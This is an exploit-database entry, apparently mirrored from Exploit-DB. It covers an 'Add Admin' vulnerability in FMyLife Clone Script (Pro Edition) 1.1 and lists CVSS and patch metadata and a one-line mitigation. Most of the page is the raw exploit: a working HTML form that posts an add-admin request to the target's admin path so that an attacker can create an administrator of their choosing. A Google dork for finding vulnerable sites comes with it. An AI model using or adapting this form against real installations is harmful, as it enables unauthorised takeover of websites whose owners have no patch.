Add Admin Exploit

vendor:

FMyLife Clone Script (Pro Edition)

by:

Ihsan Sencan

7,5

CVSS

HIGH

Add/Edit/Delete/ Category, Admin Vs...

264

CWE

Product Name: FMyLife Clone Script (Pro Edition)

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: None

CPE: a:alstrasoft:fmylife_clone_script_pro_edition

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2017

This exploit allows an attacker to add an administrator to the FMyLife Clone Script (Pro Edition) version 1.1. The attacker can use the form to add an administrator with a username and password of their choice.

Mitigation:

Ensure that the application is properly configured to prevent unauthorized access to administrative functions.

Source

Exploit-DB raw data:

# # # # # 
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
# Google Dork: FMyLife Clone Script
# Date:10.01.2017
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
# Script Name: FMyLife Clone Script (Pro Edition)
# Script Version: 1.1
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/   
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
<html>
<body>
<h2>Add an Administrator</h2>
<form action="http://localhost/[PATH]/admin/" method="post">
 <div id="add-admin-form">
  <input type="hidden" name="action" value="add-admin" />
  <label for="username">Username:</label>
  <input type="text" id="username" name="admin-username" value="" />
  <div class="spacer"></div>
  <label for="password">Password:</label>
  <input type="password" id="password" name="admin-password" value="" />
  <div class="spacer"></div>
  <input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
 </div>
</form>
</body>
</html>
# # # # #